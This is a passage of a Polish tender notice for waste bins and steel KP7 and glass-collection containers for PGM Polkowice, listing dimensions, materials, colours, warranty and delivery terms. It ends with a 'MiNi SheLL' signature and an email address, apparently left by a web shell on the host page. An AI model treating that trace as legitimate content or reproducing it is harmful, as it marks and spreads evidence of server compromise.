1.	Pojemniki muszą być wykonane zgodne z normami polskimi i europejskimi.
2.	Konstrukcja pojemników musi być dostosowana do rozładunku przez śmieciarki wyposażone we wsyp mechaniczny oraz posiadać zabezpieczenia przed samoistnym spadkiem z wideł.
3.	Pojemniki muszą posiadać rączki - uchwyty ułatwiające przemieszczanie pojemnika i otwieranie pokrywy.
4.	Musi posiadać klapę 
5.	Pojemniki mają posiadać po 4 kółka jezdne o wymiarze fi 200. 
6.	Kółka muszą być metalowo-gumowe z obrotnicami umożliwiającymi swobodne manewrowanie. Oponki powinny być z pełnej gumy
7.	Pojemniki muszą być w kolorze zielonym z napisem ( wielkość liter 10 cm, kolor biały)






8.	Okres gwarancji: 12 miesięcy
9.	Stan: fabrycznie nowe


Termin dostawy (2 dostawy):   
a)	40 szt. - 2 tygodnie , licząc od dnia podpisania umowy.
b)	40szt. - 5 tygodni, licząc od dnia podpisania umowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6, 44.61.33.00-3, 44.61.90.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa kontenerów KP7 zamkniętych - sz 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kontenery muszą być wykonane zgodnie z normami polskimi i europejskimi oraz spełniać następujące wymagania :
1.	Dno kontenera wykonane z blachy stalowej o grubości co najmniej 3 mm wzmocnione
       poprzeczkami.
2.	Ściany boczne wykonane z blachy stalowej o grubości co najmniej 2 mm. Kontener musi być wzmocniony kształtownikami i tłoczeniami w ścianach. Blokady, zamknięcia i elementy (hak główny i elementy zaczepne boczne) zgodne z obowiązującymi normami. 
3.	Przejście dna w ściany boczne skośne ( wysokość skosu 100 mm).
4.	Rama nośna wykonana z ceownika walcowanego na gorąco co najmniej 180 mm.
5.	Ściany boczne wzmocnione górnym wieńcem z profilu 100*50*3 (spoiny na długości co najmniej 50% długości połączenia wieńca) zaopatrzone w haczyki do mocowanie plandeki.
6.	Łączenia blach wykonane spawem ciągłym.
7.	Ściana przednia wzmocniona na wysokości haka blachą o grubości co najmniej 5mm
8.	Tylną ścianę kontenerów stanowić muszą drzwi jednoskrzydłowe otwierane od dołu z zamknięciem i zabezpieczeniem.
9.	Pod tylną krawędzią zamontowane dwie rolki jezdne o długości co najmniej 180mm i średnicy 160 mm na łożyskach bezobsługowych.
10.	Szerokość kontenera1730 mm
11.	Wysokość kontenera 1500 mm
12.	Długość kontenera 3450 mm
13.	Kontenery piaskowane malowane dwukrotnie farbą podkładową oraz lakierowane w
       kolorze zielonym RAL 6029
14.	Kontenery zakryte muszą posiadać co najmniej 6 otworów wrzutowych po trzy z każdej strony o wymiarach 520 x 680mm. Każda pokrywa powinna być wyposażona w zawiasy uniemożliwiające odchylenie pokrywy do kąta większego niż 120°.
15.	Kontenery musi być zaopatrzone w tabliczki znamionowe z oznaczeniem : nazwa producenta, pojemność i dopuszczalna ładowności, roku produkcji.
16.	Kontenery muszą zawierać napis, który jest podany niżej, wielkość liter 10 cm:

PGM Sp. z o.o.
Polkowice
Tel. 076/ 846- 29- 44


17.	Oświadczenie, że kontener został wykonany zgodnie z przepisami BHP i Unii Europejskiej
18.	Okres gwarancji: 12 miesięcy.
19.	Stan: fabrycznie nowe
20.	Do dostarczonych kontenerów musi być załączona karta gwarancyjna.

Termin dostawy 5 tygodni, licząc od dnia podpisania umowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6, 44.61.33.00-3, 44.61.90.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa kontenera na szkło do selektywnej zbiórki odpadów - szt. 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kontenery musi być wykonane zgodnie z normami polskimi i europejskimi oraz spełniać następujące wymagania :
1.	Kontener z blachy St3s o wymiarach 5000 x 2500 x h=2100mm ,
2.	Pojemność kontenera ok. 26 m3
3.	Hak na wysokości - DIN 30722
4.	Płozy ceownik hutniczy 180 mm, rozstaw 1015 mm /jak KP7/,
5.	Plandeka rozwijana na szerokości kontenera na zwijadle,
6.	Tylną ścianę kontenera stanowić muszą drzwi jedno skrzydłowe otwierane od dołu z zamknięciem oraz zabezpieczeniem otwieranym z boku,
7.	Przegroda wewnętrzna ruchoma ,otwierana od dołu z zabezpieczeniem     uniemożliwiającym samoczynne otwarcie przegrody podczas rozładunku,
8.	Przejście dna w ściany boczne pod kątem prostym,
9.	Drabinki po obu stronach haka,
10.	Rolki jezdne dwie sztuki na łożyskach bez obsługowych, rozstaw wewnętrzny rolek 1550 mm.
11.	Poszycie boczne z blachy o grub. 2,5 mm,
12.	Podłoga z blachy o grub. 3 mm,
13.	Malowany farbą podkładową i nawierzchniową kolorem wg RAL 2011.
14.	Stan: fabrycznie nowy
15.	Okres gwarancji: 12 miesięcy

Termin dostawy 5 tygodni, licząc od dnia podpisania umowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6, 44.61.33.00-3, 44.61.90.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com